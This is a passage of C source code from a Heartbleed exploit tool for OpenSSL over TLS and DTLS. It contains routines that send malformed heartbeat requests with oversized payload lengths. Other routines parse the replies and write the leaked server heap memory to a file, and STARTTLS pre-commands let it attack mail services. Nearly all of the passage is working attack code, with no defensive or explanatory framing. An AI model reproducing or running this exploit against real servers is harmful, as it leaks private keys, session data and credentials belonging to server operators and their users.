setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n if(ret==-1){\r\n printf(\"[!] cannot bind socket\\n\");\r\n exit(0);\r\n }\r\n listen(sd,5);\r\n return(sd);\r\n}\r\n \r\nconnection* dtls_server(int sd, char* server,int port){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n unsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"bind()\");\r\n exit(1);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n \r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n// bytes = SSL_read(c->sslHandle, buf, 4095);\r\n// printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n \r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nconnection* dtls_client(int sd, char* server,int port){\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n memset((char *)&sa,0,sizeof(sa));\r\n c = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"connect()\");\r\n exit(0);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n \r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n \r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n SSL_set_tlsext_host_name(c->sslHandle,server);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n BIO_ctrl_set_connected(bio, 1, &sa);\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_connect_state (c->sslHandle);\r\n//printf(\"eshta\\n\");\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n \r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat);\r\n }\r\n return c;\r\n}\r\n \r\nconnection* tls_bind(int sd){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n bytes = SSL_read(c->sslHandle, buf, 4095);\r\n printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nint pre_cmd(int sd,int precmd,int verbose){\r\n /* this function can be used to send commands to a plain-text\r\n service or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n int rc, go = 0;\r\n char* buffer;\r\n char* line1;\r\n char* line2; \r\n switch(precmd){\r\n case 0:\r\n line1 = \"EHLO test\\n\";\r\n line2 = \"STARTTLS\\n\";\r\n break;\r\n case 1:\r\n line1 = \"CAPA\\n\";\r\n line2 = \"STLS\\n\";\r\n break;\r\n case 2:\r\n line1 = \"a001 CAPB\\n\";\r\n line2 = \"a002 STARTTLS\\n\";\r\n break;\r\n default:\r\n go = 1;\r\n break;\r\n }\r\n if(go==0){\r\n buffer = malloc(2049);\r\n if(buffer==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n printf(\"[ banner: %s\",buffer);\r\n send(sd,line1,strlen(line1),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n send(sd,line2,strlen(line2),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n }\r\n return sd;\r\n}\r\n \r\nvoid* heartbleed(connection *c,unsigned int type){\r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n s2n(0xffff,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n return c;\r\n}\r\n \r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n \r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2 + 16);\r\n memset(buf, '\\0', sizeof buf);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n// s2n(0xffff,p);\r\n// s2n(0x3feb,p);\r\n s2n(0x0538,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n s2n(c->sslHandle->tlsext_hb_seq, p);\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n \r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n \r\n if (ret >= 0)\r\n {\r\n if (c->sslHandle->msg_callback)\r\n c->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n buf, 3 + 16,\r\n c->sslHandle, c->sslHandle->msg_callback_arg);\r\n \r\n dtls1_start_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_pending = 1;\r\n }\r\n \r\n OPENSSL_free(buf);\r\n \r\n return c;\r\n}\r\n \r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\n \r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n DTLS1_BITMAP *bitmap;\r\n unsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n \r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n \r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->epoch);\r\n memcpy(&(s->s3->read_sequence[2]), p, 6);\r\n p+=6;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n if ( n != i)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n \r\n bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n if ( bitmap == NULL)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n if (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n *p == SSL3_MT_CLIENT_HELLO) &&\r\n !dtls1_record_replay_check(s, bitmap))\r\n {\r\n rr->length = 0;\r\n s->packet_length=0;\r\n goto again;\r\n }\r\n \r\n if (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n {\r\n if ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n {\r\n dtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n }\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n \r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n orig_len=rr->length;\r\n \r\n dtls1_enc(s,0);\r\n \r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n \r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n \r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n dtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n \r\n dtls1_stop_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_seq++;\r\n c->sslHandle->tlsext_hb_pending = 0;\r\n \r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n \r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n \r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n \r\n return NULL;\r\n }\r\n \r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n shift = -cmp;\r\n if (shift >= sizeof(bitmap->map)*8)\r\n return 0;\r\n else if (bitmap->map & (1UL<<shift))\r\n return 0;\r\n \r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n \r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{ int ret,sat,brw,i;\r\n \r\n if (sizeof(long) == 8) do\r\n { const union { long one; char little; } is_endian = {1};\r\n long l;\r\n \r\n if (is_endian.little) break;\r\n \r\n if (((size_t)v1|(size_t)v2)&0x7) break;\r\n \r\n l = *((long *)v1);\r\n l -= *((long *)v2);\r\n if (l>128) return 128;\r\n else if (l<-128) return -128;\r\n else return (int)l;\r\n } while (0);\r\n \r\n ret = (int)v1[7]-(int)v2[7];\r\n sat = 0;\r\n brw = ret>>8;\r\n if (ret & 0x80)\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= ~brw;\r\n brw >>= 8;\r\n }\r\n }\r\n else\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= brw;\r\n brw >>= 8;\r\n }\r\n }\r\n brw <<= 8;\r\n \r\n if (sat&0xff) return brw | 0x80;\r\n else return brw + (ret&0xFF);\r\n}\r\n \r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n {\r\n DTLS1_RECORD_DATA *rdata;\r\n pitem *item;\r\n \r\n if (pqueue_size(queue->q) >= 100)\r\n return 0;\r\n \r\n rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n item = pitem_new(priority, rdata);\r\n if (rdata == NULL || item == NULL)\r\n {\r\n if (rdata != NULL) OPENSSL_free(rdata);\r\n if (item != NULL) pitem_free(item);\r\n \r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n return(0);\r\n }\r\n \r\n rdata->packet = s->packet;\r\n rdata->packet_length = s->packet_length;\r\n memcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n \r\n item->data = rdata;\r\n \r\n#ifndef OPENSSL_NO_SCTP\r\n if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n }\r\n#endif\r\n \r\n if (pqueue_insert(queue->q, item) == NULL)\r\n {\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n s->packet = NULL;\r\n s->packet_length = 0;\r\n memset(&(s->s3->rbuf), 0, 